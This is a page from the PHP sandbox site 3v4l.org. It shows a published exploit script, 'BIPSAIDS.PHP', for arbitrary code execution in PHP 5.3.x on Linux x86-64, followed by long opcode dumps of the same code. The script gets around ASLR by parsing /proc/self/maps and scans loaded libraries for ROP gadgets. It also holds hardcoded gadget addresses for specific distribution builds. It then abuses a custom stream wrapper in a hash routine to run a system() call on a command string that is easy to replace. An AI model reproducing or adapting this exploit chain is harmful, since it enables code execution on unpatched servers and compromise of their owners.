3v4l.org

run code in 300+ PHP versions simultaneously
<?php /* * BIPSAIDS.PHP -- by blasty <blasty@fail0verflow.com> * * PHP 5.3.x Linux x86-64 arbitrary code execution * * based on : MOPS-2010-001 (yes, bugs from 2010 live in <s>2011</s> 2012) * * NOTES: * Most distro's ship with PIE compiled httpd's these days, and everyone * seems to favour php5 as module rather than using php-cgi. This puts us * in an annoying position for doing Return-oriented-whatever. * * So the bad news is this exploit only works without restrictions against * machines that use php5-cgi and where gadgets have already been identified. * * However, the good news is if PHP doesn't enforce open_basedir restrictions * there's still a fat chance this exploit will succeed by parsing /proc/self/maps * to circumvent ASLR and identify gadgets during runtime by scanning libraries. * */ error_reporting(E_ALL); $CMD = "php-4.3.0 --version"; function ustruct($fmt, $data) { $out = array(); $pos = 0; $upack = array('u16'=>'S','u32'=>'V','u64'=>'V2'); $sizes = array('u16'=> 2 ,'u32'=> 4 ,'u64'=> 8 ); foreach($fmt as $name => $type) { $v = unpack($upack[$type], substr($data, $pos, $sizes[$type])); if ($type == 'u64') $v = ($v[2] << 32) | $v[1]; else $v = $v[1]; $out[$name] = $v; $pos += $sizes[$type]; } return $out; } function get_sections($filename) { $elf64_header = array( 'e_ident0' => 'u64', 'e_ident1' => 'u64', 'type' => 'u16', 'machine' => 'u16', 'version' => 'u32', 'entry' => 'u64', 'phoff' => 'u64', 'shoff' => 'u64', 'flags' => 'u32', 'ehsize' => 'u16', 'phentsize' => 'u16', 'phnum' => 'u16', 'shentsize' => 'u16', 'shnum' => 'u16', 'shstrndx' => 'u16' ); $elf64_sh = array( 'name' => 'u32', 'type' => 'u32', 'flags' => 'u64', 'addr' => 'u64', 'offset' => 'u64', 'size' => 'u64', 'link' => 'u32', 'info' => 'u32', 'align' => 'u64', 'entsize'=> 'u64' ); $buf = file_get_contents($filename); $hdr = ustruct($elf64_header, substr($buf, 0, 0x40)); echo "[>>] $filename\n"; $sections = array(); for($i = 0; $i < $hdr['shnum']; $i++) { $data = substr($buf, $hdr['shoff'] + ($i * $hdr['shentsize']), $hdr['shentsize']); $sections[] = ustruct($elf64_sh, $data); } $str_section = $sections[ $hdr['shstrndx'] ]; $ret_sections = array(); for($i = 0; $i < count($sections); $i++) { if (!($sections[$i]['flags']&4)) continue; $v = explode("\x00", substr($buf, $str_section['offset'] + $sections[$i]['name']) ); $sections[$i]['str'] = $v[0]; $sections[$i]['data'] = substr($buf, $sections[$i]['offset'], $sections[$i]['size']); $ret_sections[] = $sections[$i]; } return $ret_sections; } function find_gadgets($gg, $data, $base=0) { $ret = array(); foreach($gg as $name => $patterns) { if (!is_array($patterns)) $patterns = array($patterns); foreach($patterns as $pattern) { if (($pos = strpos($data, $pattern)) !== false) { $ret[$name] = $base+$pos; } } } return $ret; } function w64($v) { return pack("V", $v & 0xffffffff) . pack("V", $v >> 32); } $resolve = true; if ( ((isset($_SERVER['ORIG_SCRIPT_NAME']) && strstr($_SERVER['ORIG_SCRIPT_NAME'], "cgi") !== false) || (isset($_SERVER['ORIG_SCRIPT_FILENAME']) && strstr($_SERVER['ORIG_SCRIPT_FILENAME'], "cgi") !== false)) ) { $resolve = false; $cgirop = array( "5.3.2-1ubuntu4.10" => array(0x42c1b8, 0x42fd31, 0x42c59d, 0x65ca2b, 0x5f0758, 0x53c720, 0xd6a830, 0x096a20), "5.3.5-1ubuntu7.3" => array(0x429d4f, 0x42f3e1, 0x428c26, 0x50b22d, 0x5f0758, 0x6b1730, 0xdae7d0, 0x095260), "5.3.3-7+squeeze3" => array(0x42d478, 0x4310c1, 0x42d85d, 0x648bdb, 0x5dc538, 0x527600, 0xd5b810, 0x084970), //"5.3.8" /* ARCH */ => array(0x42544c, 0x4294ba, 0x42460b, 0x428f57, 0x427859, 0x423476, ); $v = phpversion(); if (!isset($cgirop[$v])) { echo "plz2portgadgets: ".$v."\nattempting fallback!\n"; $resolve = true; } else $addy = $cgirop[$v]; } if (!isset($addy)) { $patterns = array( 'ADDRSP' => "\x48\x83\xc4\x28\xc3", 'POPRAX' => "\x58\xc3", 'LEACALL' => array( "\x48\x8d\x7c\x24\x10\xff\xd0", "\x48\x8d\x7c\x24\x18\xff\xe0" ), 'SYSTEM' => "\x53\x48\x83\xec\x10\x48\x85\xff\x74\x16" ); $maps = explode("\n", file_get_contents("/proc/self/maps") ); $gadgets = array(); foreach($maps as $map) { $map = explode(" ", preg_replace('!\s+!', ' ', $map)); if (count($map)<2 || !strstr($map[1], "x") || $map[5][0] == '[') continue; if (count($patterns) == 1 && !strstr($map[5], "libc")) continue; $exec_sections = get_sections($map[5]); $tmp = explode("-", $map[0]); $page_offs = hexdec($tmp[0]); foreach($exec_sections as $section) { $new_gadgets = find_gadgets( $patterns, $section['data'], $section['offset'] ); foreach($new_gadgets as $name => $offs) { if (isset($patterns[$name])) { printf(" `- found gadget '%s' in [%s -> %s] @ 0x%x\n", $name, $map[5], $section['str'], $page_offs+$offs); unset($patterns[$name]); $new_gadgets[$name] += $page_offs; } } if (count($new_gadgets) > 0) $gadgets = array_merge($gadgets, $new_gadgets); if (count($patterns) == 0) { echo "!!! ALL GADGETS FOUND, LETS-A-GO !!!\n"; break 2; } } } $addy = $gadgets; } if (isset($gadgets)) { $ropvar = array('ADDRSP','POPRAX','LEACALL','SYSTEM'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $ropvar[$i] ]); $$ropvar[$i] = w64($addy[ $ropvar[$i] ]); } } else { $ropvar = array('ADDRSP','POPRAX','POPRDI','DEREFRAX','SUBRDIRAX','LEACALL','GOTENTRY','LIBCDELTA'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $i ]); $$ropvar[$i] = w64($addy[ $i ]); } } if (!isset($addy) || count($addy) != count($ropvar)) die("looks like this tech isn't compatible with your box.\n"); class evil_stream { function stream_open($a, $b, $c, &$e) { return 1; } function stream_eof() { return 0; } function stream_seek($offset, $whence) { return 0; } function stream_read($count) { global $ADDRSP, $POPRAX, $GOTENTRY, $DEREFRAX, $POPRDI, $LIBCDELTA, $SUBRDIRAX, $LEACALL, $CMD, $SYSTEM; hash_final($GLOBALS['hid'], false); $GLOBALS['a'] = str_repeat($ADDRSP, 3); // add 40, rsp if (isset($SYSTEM) && !empty($SYSTEM)) return $POPRAX . $SYSTEM . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . "\x00"; else return $POPRAX . $GOTENTRY . $DEREFRAX . $POPRDI . $LIBCDELTA . $SUBRDIRAX . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . " ; echo lol\x00"; } } stream_wrapper_register("evil", "evil_stream") || die("oh snap :(\n"); $hid = hash_init('md5'); hash_update_file($hid, "evil://code"); echo "you goofed up\n"; ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 8, Position 2 = 16
Branch analysis from position: 8
2 jumps found. (Code = 47) Position 1 = 17, Position 2 = 29
Branch analysis from position: 17
2 jumps found. (Code = 46) Position 1 = 20, Position 2 = 28
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 30, Position 2 = 45
Branch analysis from position: 30
2 jumps found. (Code = 43) Position 1 = 38, Position 2 = 43
Branch analysis from position: 38
1 jumps found. (Code = 42) Position 1 = 45
Branch analysis from position: 45
2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 164
Branch analysis from position: 48
2 jumps found. (Code = 77) Position 1 = 59, Position 2 = 162
Branch analysis from position: 59
2 jumps found. (Code = 78) Position 1 = 60, Position 2 = 162
Branch analysis from position: 60
2 jumps found. (Code = 47) Position 1 = 73, Position 2 = 80
Branch analysis from position: 73
2 jumps found. (Code = 47) Position 1 = 81, Position 2 = 85
Branch analysis from position: 81
2 jumps found. (Code = 43) Position 1 = 86, Position 2 = 87
Branch analysis from position: 86
1 jumps found. (Code = 42) Position 1 = 59
Branch analysis from position: 59
Branch analysis from position: 87
2 jumps found. (Code = 46) Position 1 = 90, Position 2 = 97
Branch analysis from position: 90
2 jumps found. (Code = 43) Position 1 = 98, Position 2 = 99
Branch analysis from position: 98
1 jumps found. (Code = 42) Position 1 = 59
Branch analysis from position: 59
Branch analysis from position: 99
2 jumps found. (Code = 77) Position 1 = 116, Position 2 = 160
Branch analysis from position: 116
2 jumps found. (Code = 78) Position 1 = 117, Position 2 = 160
Branch analysis from position: 117
2 jumps found. (Code = 77) Position 1 = 126, Position 2 = 144
Branch analysis from position: 126
2 jumps found. (Code = 78) Position 1 = 127, Position 2 = 144
Branch analysis from position: 127
2 jumps found. (Code = 43) Position 1 = 130, Position 2 = 143
Branch analysis from position: 130
1 jumps found. (Code = 42) Position 1 = 126
Branch analysis from position: 126
Branch analysis from position: 143
Branch analysis from position: 144
2 jumps found. (Code = 43) Position 1 = 148, Position 2 = 153
Branch analysis from position: 148
2 jumps found. (Code = 43) Position 1 = 156, Position 2 = 159
Branch analysis from position: 156
1 jumps found. (Code = 42) Position 1 = 162
Branch analysis from position: 162
2 jumps found. (Code = 43) Position 1 = 166, Position 2 = 190
Branch analysis from position: 166
1 jumps found. (Code = 42) Position 1 = 186
Branch analysis from position: 186
2 jumps found. (Code = 44) Position 1 = 189, Position 2 = 169
Branch analysis from position: 189
1 jumps found. (Code = 42) Position 1 = 211
Branch analysis from position: 211
2 jumps found. (Code = 47) Position 1 = 214, Position 2 = 218
Branch analysis from position: 214
2 jumps found. (Code = 43) Position 1 = 219, Position 2 = 220
Branch analysis from position: 219
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 220
2 jumps found. (Code = 47) Position 1 = 225, Position 2 = 227
Branch analysis from position: 225
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 227
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 218
Branch analysis from position: 169
2 jumps found. (Code = 44) Position 1 = 189, Position 2 = 169
Branch analysis from position: 189
Branch analysis from position: 169
Branch analysis from position: 190
1 jumps found. (Code = 42) Position 1 = 208
Branch analysis from position: 208
2 jumps found. (Code = 44) Position 1 = 211, Position 2 = 193
Branch analysis from position: 211
Branch analysis from position: 193
2 jumps found. (Code = 44) Position 1 = 211, Position 2 = 193
Branch analysis from position: 211
Branch analysis from position: 193
Branch analysis from position: 159
1 jumps found. (Code = 42) Position 1 = 116
Branch analysis from position: 116
Branch analysis from position: 153
Branch analysis from position: 144
Branch analysis from position: 160
1 jumps found. (Code = 42) Position 1 = 59
Branch analysis from position: 59
Branch analysis from position: 160
Branch analysis from position: 97
Branch analysis from position: 85
Branch analysis from position: 80
Branch analysis from position: 162
Branch analysis from position: 162
Branch analysis from position: 164
Branch analysis from position: 43
2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 164
Branch analysis from position: 48
Branch analysis from position: 164
Branch analysis from position: 45
Branch analysis from position: 28
Branch analysis from position: 29
Branch analysis from position: 16
filename:       /in/4voOh
function name:  (null)
number of ops:  237
compiled vars:  !0 = $CMD, !1 = $resolve, !2 = $cgirop, !3 = $v, !4 = $addy, !5 = $patterns, !6 = $maps, !7 = $gadgets, !8 = $map, !9 = $exec_sections, !10 = $tmp, !11 = $page_offs, !12 = $section, !13 = $new_gadgets, !14 = $offs, !15 = $name, !16 = $ropvar, !17 = $i, !18 = $hid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   22     0  E >   INIT_FCALL                                               'error_reporting'
          1        SEND_VAL                                                 32767
          2        DO_ICALL                                                 
   24     3        ASSIGN                                                   !0, 'php-4.3.0+--version'
  107     4        ASSIGN                                                   !1, <true>
  110     5        FETCH_IS                                         ~22     '_SERVER'
          6        ISSET_ISEMPTY_DIM_OBJ                         0  ~23     ~22, 'ORIG_SCRIPT_NAME'
          7      > JMPZ_EX                                          ~23     ~23, ->16
          8    >   INIT_FCALL                                               'strstr'
          9        FETCH_R                      global              ~24     '_SERVER'
         10        FETCH_DIM_R                                      ~25     ~24, 'ORIG_SCRIPT_NAME'
         11        SEND_VAL                                                 ~25
         12        SEND_VAL                                                 'cgi'
         13        DO_ICALL                                         $26     
         14        TYPE_CHECK                                  1018  ~27     $26
         15        BOOL                                             ~23     ~27
         16    > > JMPNZ_EX                                         ~23     ~23, ->29
  111    17    >   FETCH_IS                                         ~28     '_SERVER'
         18        ISSET_ISEMPTY_DIM_OBJ                         0  ~29     ~28, 'ORIG_SCRIPT_FILENAME'
         19      > JMPZ_EX                                          ~29     ~29, ->28
         20    >   INIT_FCALL                                               'strstr'
         21        FETCH_R                      global              ~30     '_SERVER'
         22        FETCH_DIM_R                                      ~31     ~30, 'ORIG_SCRIPT_FILENAME'
         23        SEND_VAL                                                 ~31
         24        SEND_VAL                                                 'cgi'
         25        DO_ICALL                                         $32     
         26        TYPE_CHECK                                  1018  ~33     $32
         27        BOOL                                             ~29     ~33
         28    >   BOOL                                             ~23     ~29
         29    > > JMPZ                                                     ~23, ->45
  113    30    >   ASSIGN                                                   !1, <false>
  115    31        ASSIGN                                                   !2, <array>
  122    32        INIT_FCALL                                               'phpversion'
         33        DO_ICALL                                         $36     
         34        ASSIGN                                                   !3, $36
  123    35        ISSET_ISEMPTY_DIM_OBJ                         0  ~38     !2, !3
         36        BOOL_NOT                                         ~39     ~38
         37      > JMPZ                                                     ~39, ->43
  124    38    >   CONCAT                                           ~40     'plz2portgadgets%3A+', !3
         39        CONCAT                                           ~41     ~40, '%0Aattempting+fallback%21%0A'
         40        ECHO                                                     ~41
  125    41        ASSIGN                                                   !1, <true>
         42      > JMP                                                      ->45
  127    43    >   FETCH_DIM_R                                      ~43     !2, !3
         44        ASSIGN                                                   !4, ~43
  130    45    >   ISSET_ISEMPTY_CV                                 ~45     !4
         46        BOOL_NOT                                         ~46     ~45
         47      > JMPZ                                                     ~46, ->164
  131    48    >   ASSIGN                                                   !5, <array>
  141    49        INIT_FCALL                                               'explode'
         50        SEND_VAL                                                 '%0A'
  142    51        INIT_FCALL                                               'file_get_contents'
         52        SEND_VAL                                                 '%2Fproc%2Fself%2Fmaps'
         53        DO_ICALL                                         $48     
         54        SEND_VAR                                                 $48
         55        DO_ICALL                                         $49     
  141    56        ASSIGN                                                   !6, $49
  144    57        ASSIGN                                                   !7, <array>
  145    58      > FE_RESET_R                                       $52     !6, ->162
         59    > > FE_FETCH_R                                               $52, !8, ->162
  146    60    >   INIT_FCALL                                               'explode'
         61        SEND_VAL                                                 '+'
         62        INIT_FCALL                                               'preg_replace'
         63        SEND_VAL                                                 '%21%5Cs%2B%21'
         64        SEND_VAL                                                 '+'
         65        SEND_VAR                                                 !8
         66        DO_ICALL                                         $53     
         67        SEND_VAR                                                 $53
         68        DO_ICALL                                         $54     
         69        ASSIGN                                                   !8, $54
  147    70        COUNT                                            ~56     !8
         71        IS_SMALLER                                       ~57     ~56, 2
         72      > JMPNZ_EX                                         ~57     ~57, ->80
         73    >   INIT_FCALL                                               'strstr'
         74        FETCH_DIM_R                                      ~58     !8, 1
         75        SEND_VAL                                                 ~58
         76        SEND_VAL                                                 'x'
         77        DO_ICALL                                         $59     
         78        BOOL_NOT                                         ~60     $59
         79        BOOL                                             ~57     ~60
         80    > > JMPNZ_EX                                         ~57     ~57, ->85
         81    >   FETCH_DIM_R                                      ~61     !8, 5
         82        FETCH_DIM_R                                      ~62     ~61, 0
         83        IS_EQUAL                                         ~63     ~62, '%5B'
         84        BOOL                                             ~57     ~63
         85    > > JMPZ                                                     ~57, ->87
  148    86    > > JMP                                                      ->59
  149    87    >   COUNT                                            ~64     !5
         88        IS_EQUAL                                         ~65     ~64, 1
         89      > JMPZ_EX                                          ~65     ~65, ->97
         90    >   INIT_FCALL                                               'strstr'
         91        FETCH_DIM_R                                      ~66     !8, 5
         92        SEND_VAL                                                 ~66
         93        SEND_VAL                                                 'libc'
         94        DO_ICALL                                         $67     
         95        BOOL_NOT                                         ~68     $67
         96        BOOL                                             ~65     ~68
         97    > > JMPZ                                                     ~65, ->99
  150    98    > > JMP                                                      ->59
  151    99    >   INIT_FCALL                                               'get_sections'
        100        FETCH_DIM_R                                      ~69     !8, 5
        101        SEND_VAL                                                 ~69
        102        DO_FCALL                                      0  $70     
        103        ASSIGN                                                   !9, $70
  153   104        INIT_FCALL                                               'explode'
        105        SEND_VAL                                                 '-'
        106        FETCH_DIM_R                                      ~72     !8, 0
        107        SEND_VAL                                                 ~72
        108        DO_ICALL                                         $73     
        109        ASSIGN                                                   !10, $73
  154   110        INIT_FCALL                                               'hexdec'
        111        FETCH_DIM_R                                      ~75     !10, 0
        112        SEND_VAL                                                 ~75
        113        DO_ICALL                                         $76     
        114        ASSIGN                                                   !11, $76
  156   115      > FE_RESET_R                                       $78     !9, ->160
        116    > > FE_FETCH_R                                               $78, !12, ->160
  157   117    >   INIT_FCALL                                               'find_gadgets'
  158   118        SEND_VAR                                                 !5
        119        FETCH_DIM_R                                      ~79     !12, 'data'
        120        SEND_VAL                                                 ~79
        121        FETCH_DIM_R                                      ~80     !12, 'offset'
        122        SEND_VAL                                                 ~80
        123        DO_FCALL                                      0  $81     
  157   124        ASSIGN                                                   !13, $81
  160   125      > FE_RESET_R                                       $83     !13, ->144
        126    > > FE_FETCH_R                                       ~84     $83, !14, ->144
        127    >   ASSIGN                                                   !15, ~84
  161   128        ISSET_ISEMPTY_DIM_OBJ                         0          !5, !15
        129      > JMPZ                                                     ~86, ->143
  162   130    >   INIT_FCALL                                               'printf'
        131        SEND_VAL                                                 '++%60-+found+gadget+%27%25s%27+in+%5B%25s+-%3E+%25s%5D+%40+0x%25x%0A'
        132        SEND_VAR                                                 !15
        133        FETCH_DIM_R                                      ~87     !8, 5
        134        SEND_VAL                                                 ~87
        135        FETCH_DIM_R                                      ~88     !12, 'str'
        136        SEND_VAL                                                 ~88
        137        ADD                                              ~89     !11, !14
        138        SEND_VAL                                                 ~89
        139        DO_ICALL                                                 
  163   140        UNSET_DIM                                                !5, !15
  164   141        ASSIGN_DIM_OP                +=               1          !13, !15
        142        OP_DATA                                                  !11
  160   143    > > JMP                                                      ->126
        144    >   FE_FREE                                                  $83
  167   145        COUNT                                            ~92     !13
        146        IS_SMALLER                                               0, ~92
        147      > JMPZ                                                     ~93, ->153
  168   148    >   INIT_FCALL                                               'array_merge'
        149        SEND_VAR                                                 !7
        150        SEND_VAR                                                 !13
        151        DO_ICALL                                         $94     
        152        ASSIGN                                                   !7, $94
  169   153    >   COUNT                                            ~96     !5
        154        IS_EQUAL                                                 ~96, 0
        155      > JMPZ                                                     ~97, ->159
  170   156    >   ECHO                                                     '%21%21%21+ALL+GADGETS+FOUND%2C+LETS-A-GO+%21%21%21%0A'
  171   157        FE_FREE                                                  $78
        158      > JMP                                                      ->162
  156   159    > > JMP                                                      ->116
        160    >   FE_FREE                                                  $78
  145   161      > JMP                                                      ->59
        162    >   FE_FREE                                                  $52
  175   163        ASSIGN                                                   !4, !7
  177   164    >   ISSET_ISEMPTY_CV                                         !7
        165      > JMPZ                                                     ~99, ->190
  178   166    >   ASSIGN                                                   !16, <array>
  179   167        ASSIGN                                                   !17, 0
        168      > JMP                                                      ->186
  180   169    >   INIT_FCALL                                               'printf'
        170        SEND_VAL                                                 'setting+%25s+to+0x%25x%0A'
        171        FETCH_DIM_R                                      ~102    !16, !17
        172        SEND_VAL                                                 ~102
        173        FETCH_DIM_R                                      ~103    !16, !17
        174        FETCH_DIM_R                                      ~104    !4, ~103
        175        SEND_VAL                                                 ~104
        176        DO_ICALL                                                 
  181   177        INIT_FCALL                                               'w64'
        178        FETCH_DIM_R                                      ~108    !16, !17
        179        FETCH_DIM_R                                      ~109    !4, ~108
        180        SEND_VAL                                                 ~109
        181        DO_FCALL                                      0  $110    
        182        FETCH_W                      local               $106    !16
        183        ASSIGN_DIM                                               $106, !17
        184        OP_DATA                                                  $110
  179   185        PRE_INC                                                  !17
        186    >   COUNT                                            ~112    !16
        187        IS_SMALLER                                               !17, ~112
        188      > JMPNZ                                                    ~113, ->169
        189    > > JMP                                                      ->211
  184   190    >   ASSIGN                                                   !16, <array>
  186   191        ASSIGN                                                   !17, 0
        192      > JMP                                                      ->208
  187   193    >   INIT_FCALL                                               'printf'
        194        SEND_VAL                                                 'setting+%25s+to+0x%25x%0A'
        195        FETCH_DIM_R                                      ~116    !16, !17
        196        SEND_VAL                                                 ~116
        197        FETCH_DIM_R                                      ~117    !4, !17
        198        SEND_VAL                                                 ~117
        199        DO_ICALL                                                 
  188   200        INIT_FCALL                                               'w64'
        201        FETCH_DIM_R                                      ~121    !4, !17
        202        SEND_VAL                                                 ~121
        203        DO_FCALL                                      0  $122    
        204        FETCH_W                      local               $119    !16
        205        ASSIGN_DIM                                               $119, !17
        206        OP_DATA                                                  $122
  186   207        PRE_INC                                                  !17
        208    >   COUNT                                            ~124    !16
        209        IS_SMALLER                                               !17, ~124
        210      > JMPNZ                                                    ~125, ->193
  192   211    >   ISSET_ISEMPTY_CV                                 ~126    !4
        212        BOOL_NOT                                         ~127    ~126
        213      > JMPNZ_EX                                         ~127    ~127, ->218
        214    >   COUNT                                            ~128    !4
        215        COUNT                                            ~129    !16
        216        IS_NOT_EQUAL                                     ~130    ~128, ~129
        217        BOOL                                             ~127    ~130
        218    > > JMPZ                                                     ~127, ->220
  193   219    > > EXIT                                                     'looks+like+this+tech+isn%27t+compatible+with+your+box.%0A'
  222   220    >   INIT_FCALL                                               'stream_wrapper_register'
        221        SEND_VAL                                                 'evil'
        222        SEND_VAL                                                 'evil_stream'
        223        DO_ICALL                                         $131    
        224      > JMPNZ_EX                                         ~132    $131, ->227
        225    > > EXIT                                                     'oh+snap+%3A%28%0A'
        226*       BOOL                                             ~132    <true>
  223   227    >   INIT_FCALL                                               'hash_init'
        228        SEND_VAL                                                 'md5'
        229        DO_ICALL                                         $133    
        230        ASSIGN                                                   !18, $133
  224   231        INIT_FCALL                                               'hash_update_file'
        232        SEND_VAR                                                 !18
        233        SEND_VAL                                                 'evil%3A%2F%2Fcode'
        234        DO_ICALL                                                 
  225   235        ECHO                                                     'you+goofed+up%0A'
  226   236      > RETURN                                                   1

Function ustruct:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 7, Position 2 = 36
Branch analysis from position: 7
2 jumps found. (Code = 78) Position 1 = 8, Position 2 = 36
Branch analysis from position: 8
2 jumps found. (Code = 43) Position 1 = 23, Position 2 = 29
Branch analysis from position: 23
1 jumps found. (Code = 42) Position 1 = 31
Branch analysis from position: 31
1 jumps found. (Code = 42) Position 1 = 7
Branch analysis from position: 7
Branch analysis from position: 29
1 jumps found. (Code = 42) Position 1 = 7
Branch analysis from position: 7
Branch analysis from position: 36
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 36
filename:       /in/4voOh
function name:  ustruct
number of ops:  39
compiled vars:  !0 = $fmt, !1 = $data, !2 = $out, !3 = $pos, !4 = $upack, !5 = $sizes, !6 = $type, !7 = $name, !8 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   26     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   27     2        ASSIGN                                                   !2, <array>
   28     3        ASSIGN                                                   !3, 0
   29     4        ASSIGN                                                   !4, <array>
   30     5        ASSIGN                                                   !5, <array>
   32     6      > FE_RESET_R                                       $13     !0, ->36
          7    > > FE_FETCH_R                                       ~14     $13, !6, ->36
          8    >   ASSIGN                                                   !7, ~14
   33     9        INIT_FCALL                                               'unpack'
         10        FETCH_DIM_R                                      ~16     !4, !6
         11        SEND_VAL                                                 ~16
         12        INIT_FCALL                                               'substr'
         13        SEND_VAR                                                 !1
         14        SEND_VAR                                                 !3
         15        FETCH_DIM_R                                      ~17     !5, !6
         16        SEND_VAL                                                 ~17
         17        DO_ICALL                                         $18     
         18        SEND_VAR                                                 $18
         19        DO_ICALL                                         $19     
         20        ASSIGN                                                   !8, $19
   34    21        IS_EQUAL                                                 !6, 'u64'
         22      > JMPZ                                                     ~21, ->29
   35    23    >   FETCH_DIM_R                                      ~22     !8, 2
         24        SL                                               ~23     ~22, 32
         25        FETCH_DIM_R                                      ~24     !8, 1
         26        BW_OR                                            ~25     ~23, ~24
         27        ASSIGN                                                   !8, ~25
         28      > JMP                                                      ->31
   37    29    >   FETCH_DIM_R                                      ~27     !8, 1
         30        ASSIGN                                                   !8, ~27
   38    31    >   ASSIGN_DIM                                               !2, !7
         32        OP_DATA                                                  !8
   39    33        FETCH_DIM_R                                      ~30     !5, !6
         34        ASSIGN_OP                                     1          !3, ~30
   32    35      > JMP                                                      ->7
         36    >   FE_FREE                                                  $13
   41    37      > RETURN                                                   !2
   42    38*     > RETURN                                                   null

End of function ustruct

Function get_sections:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 42
Branch analysis from position: 42
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 24
Branch analysis from position: 45
1 jumps found. (Code = 42) Position 1 = 90
Branch analysis from position: 90
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 51
2 jumps found. (Code = 43) Position 1 = 56, Position 2 = 57
Branch analysis from position: 56
1 jumps found. (Code = 42) Position 1 = 89
Branch analysis from position: 89
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
Branch analysis from position: 51
Branch analysis from position: 57
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
Branch analysis from position: 51
Branch analysis from position: 24
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 24
Branch analysis from position: 45
Branch analysis from position: 24
filename:       /in/4voOh
function name:  get_sections
number of ops:  95
compiled vars:  !0 = $filename, !1 = $elf64_header, !2 = $elf64_sh, !3 = $buf, !4 = $hdr, !5 = $sections, !6 = $i, !7 = $data, !8 = $str_section, !9 = $ret_sections, !10 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   43     0  E >   RECV                                             !0      
   44     1        ASSIGN                                                   !1, <array>
   55     2        ASSIGN                                                   !2, <array>
   62     3        INIT_FCALL                                               'file_get_contents'
          4        SEND_VAR                                                 !0
          5        DO_ICALL                                         $13     
          6        ASSIGN                                                   !3, $13
   63     7        INIT_FCALL                                               'ustruct'
          8        SEND_VAR                                                 !1
          9        INIT_FCALL                                               'substr'
         10        SEND_VAR                                                 !3
         11        SEND_VAL                                                 0
         12        SEND_VAL                                                 64
         13        DO_ICALL                                         $15     
         14        SEND_VAR                                                 $15
         15        DO_FCALL                                      0  $16     
         16        ASSIGN                                                   !4, $16
   64    17        ROPE_INIT                                     3  ~19     '%5B%3E%3E%5D+'
         18        ROPE_ADD                                      1  ~19     ~19, !0

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
167.25 ms | 1430 KiB | 46 Q